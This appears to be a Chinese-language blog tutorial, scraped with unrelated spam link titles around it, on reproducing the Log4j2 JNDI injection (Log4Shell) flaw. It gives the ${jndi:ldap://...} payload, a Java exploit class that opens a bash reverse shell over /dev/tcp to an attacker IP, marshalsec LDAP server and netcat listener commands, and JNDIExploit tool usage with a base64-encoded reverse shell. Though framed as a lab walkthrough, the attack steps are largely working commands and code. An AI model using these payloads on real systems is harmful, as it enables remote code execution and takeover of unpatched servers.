当前位置: 首页 > news >正文

手机做网站的软件无锡网站定制公司

手机做网站的软件,无锡网站定制公司,开发者是什么职业,阿坝州城乡建设网站文章目录 一、log4j2二、背景三、影响版本四、漏洞原理五、LDAP和JNDI是什么六、漏洞手工复现1、利用DNSlog来测试漏洞是否存在2、加载恶意文件Exploit.java#xff0c;将其编译成class文件3、开启web服务4、在恶意文件Exploit.class所在的目录开启LDAP服务5、监听反弹shell的… 文章目录 一、log4j2二、背景三、影响版本四、漏洞原理五、LDAP和JNDI是什么六、漏洞手工复现1、利用DNSlog来测试漏洞是否存在2、加载恶意文件Exploit.java将其编译成class文件3、开启web服务4、在恶意文件Exploit.class所在的目录开启LDAP服务5、监听反弹shell的端口6、返回前端让受害者访问ldap的端口7、要点总结 七、漏洞工具复现1、使用工具JNDIExploit-1.2-SNAPSHOT.jar2、使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 八、总结 一、log4j2 log4j2是全球使用广泛的java日志框架同时该漏洞还影响很多全球使用量的Top序列的通用开源组件。 二、背景 ------ 2021年11月24日阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能攻击者可直接构造恶意请求触发远程代码执行漏洞。 ------ 2021年12月9日国内多家机构监测到Apache Log4j2存在任意代码执行漏洞并紧急通报相关情况。由于Apache Log4j存在递归解析功能未取得身份认证的用户可以从远程发送数据请求输入数据日志轻松触发漏洞最终在目标上执行任意代码。鉴于Apache Log4j本身涉及多种应用组件将此漏洞威胁等级调整为:严重。 三、影响版本 Log4j2.x2.14.1 四、漏洞原理 构造的payload是这样的 ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp} ------ 该漏洞是由于Apache Log4j2某些功能存在递归解析功能未经身份验证的攻击者通过发送特定恶意数据包可在目标服务器上执行任意代码。 ------ Log4j2组件在处理程序日志记录时存在JNDI注入缺陷未经授权的攻击者利用该漏洞可向目标服务器发送精心构造的恶意数据触发Log4j2组件解析缺陷实现目标服务器的任意代码执行获得目标服务器权限。 五、LDAP和JNDI是什么 ------ LDAP全称是Lightweight Directory Access Protocol( 轻型目录访问协议)LDAP可以理解是一个简单存储数据的数据库。 ------ LDAP有一个客户端和服务器端server端是用来存放资源client端主要用于查询等操作。服务端都是由各大厂商的产品的比如Microsoft的AD当然可以自己做。客户端通过LDAP协议去访问服务器端。 ------ JNDI JAVA NAMING AND Directory interfaceJava命名和目录接口)则是Java中用于访问LDAP的API是为了Java程序访问命名服务和目录服务而提供的统一API。 ------ 所以上述的payload ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp}就相当于ldap通过jndi来提供服务。xxx.xxx.xxx.xxx这个是LDAP服务器端的IP地址LDAP服务器是默认开启1389端口的Exp是一个不存在的文件名。说白了就是通过java中的JNDI 访问ldap协议的服务。 六、漏洞手工复现 1、利用DNSlog来测试漏洞是否存在 在DNSlog上获取一个域名dfkemb.dnslog.cn 在burp构造payload重新发送 ${jndi:ldap:// dfkemb.dnslog.cn:1389/Exp} 加入返回包回显400那就说明payload被过滤这时候就可以把payload进行URL编码再发送。 返回DNSlog查看 这样就说明存在漏洞 2、加载恶意文件Exploit.java将其编译成class文件 利用到javac来进行编译但这对Java版本有要求Java版本适用 的jdk 版本JDK 11.0.1、8u191、7u201、6u211 之前 下面是Exploit.java的内容 // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class Exploit {static {try {Runtime rt Runtime.getRuntime();String[] commands {bash, -c, bash -i /dev/tcp/192.168.188.177/1234 01};Process pc rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}} }使用javac编译javac Exploit.java 编译后就生产一个Exploit.class文件 3、开启web服务 python3 -m http.server 80 4、在恶意文件Exploit.class所在的目录开启LDAP服务 利用工具marshalsec-0.0.3-SNAPSHOT-all.jar java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.188.177/#Exploit 9999这一步相当于把攻击机变成服务器让目标服务器作为客户端来访问我的攻击机。 5、监听反弹shell的端口 nc -lvnp 1234 6、返回前端让受害者访问ldap的端口 最后再回到监听窗口查看 这里就成功反弹shell了。 7、要点总结 上面第2、3、4、5步都是在攻击者端操作只有第6步是在普通前端操作。上面一共开启了3个端口分别是80、1234、9999。这分别对应的是web服务、接收反弹shell的、ldap服务。 七、漏洞工具复现 1、使用工具JNDIExploit-1.2-SNAPSHOT.jar -i是攻击机所在的IP-l是LDAP服务开启的端口-p是web服务开启的端口-u是攻击后payload的使用方式。 POC java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 1389 -p 8888 -i 192.168.188.177 利用-u来查看使用的payload 选一条payload在前端来发送请求 这里选了ldap://null:1389/Basic/Command/[cmd] 这一条 2、使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar POC java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE4OC4xNzcvMjg4OCAwPiYx}|{base64,-d}|{bash,-i}” -A “192.168.188.177” 其中YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE4OC4xNzcvMjg4OCAwPiYx是bash -i /dev/tcp/192.168.188.177/2888 01的反弹shell命令的base64编码 上面的POC就是让受害者访问192.168.188.177:1389这个开启了LDAP服务的攻击端然后就反弹shell到192.168.188.177:2888这个地址和端口。 如下图 这图受害者要访问的POC是ldap://192.168.101.130:1389/ayox8z 八、总结 ------ Log4j2漏洞总的来说就是因为Log4j2默认支持解析ldap/rmi协议只要打印的日志中包括ldap/rmi协议即可并会通过名称从ldap服务端其获取对应的Class文件并使用ClassLoader在本地加载Ldap服务端返回的Class类。 ------ Apache Log4j 远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞当程序将用户输入的数据记入日志时攻击者通过构造特殊请求来触发 Apache Log4j2 中的远程代码执行漏洞从而利用此漏洞在目标服务器上执行任意代码。 ------ 利用jndi访问ldap服务后ldap服务返回了class攻击代码被攻击的服务器执行了攻击代码。远程代码执行漏洞是利用了Log4j2可以对日志中的“${}”进行解析执行来进行攻击的。 ------ 简单来说就是Java中存在jndi这个接口用来访问ldap服务因为Log4j2默认支持解析ldap/rmi协议普通服务器访问ldap服务会直接解析服务中的class文件而无需过滤。攻击者就利用这一点在class文件中写入恶意代码当普通服务器访问ldap服务时就会解析了存在恶意代码的class文件并且执行从而被攻击。
http://www.hkea.cn/news/14512482/

相关文章:

  • 网站导航栏下拉菜单东莞百度推广教程
  • 做物流的可以在那些网站找客户端百度外推排名
  • 网站建设报价东莞广州网站制作公司多少钱
  • 网站开发属于软件开发吗青海西宁网站建设
  • 凡科建站怎么收费开网店需要自己做网站吗
  • 平台网站开发企业门户网站模板
  • 上饶公司做网站室内设计效果图及文字介绍
  • 如何做热词网站友情链接的网站
  • 网站系统管理员模块淘宝网网页版登录电脑版官网
  • 郴州建设工程信息网站wordpress首页显示一张图片
  • 一半招聘网站海报格式都怎么做怎么样通过做网站赚钱
  • 网站建设算研发费用吗至少保存十个以上域名网站
  • 开一家网络公司做网站前景如何wordpress主题如何购买
  • 江门网站seo关键词排名优化上一篇 下一篇 wordpress
  • 建立网站的平台网站建设结论
  • nodejs 做网站js交件公司网站模板源码
  • 温州小学网站建设中国世界排名前200的大学名单
  • 语言文字建设网站wordpress 结构分析
  • 域名解析映射到网站空间怎么做163免费企业邮箱
  • 可以做宣传海报的网站哪个公司做视频网站
  • 网站建设外包协议线上做图的网站
  • 高校网站建设工作总结python网站开发优缺点
  • 网站推广如何做的公司免费招聘网站
  • 中卫网站设计在哪里vip视频网站如何做
  • 如何自己创造网站怎么在电脑找到wordpress模板代码
  • 长沙协会网站设计专业服务建设网站的网页设计
  • 什么样的企业需要做网站wordpress二次元模板
  • wordpress建站流程wordpress网站云备份
  • 网站建设推广什么意思外贸流程的英文
  • 云南建设人力资源网站北京搜索引擎优化管理专员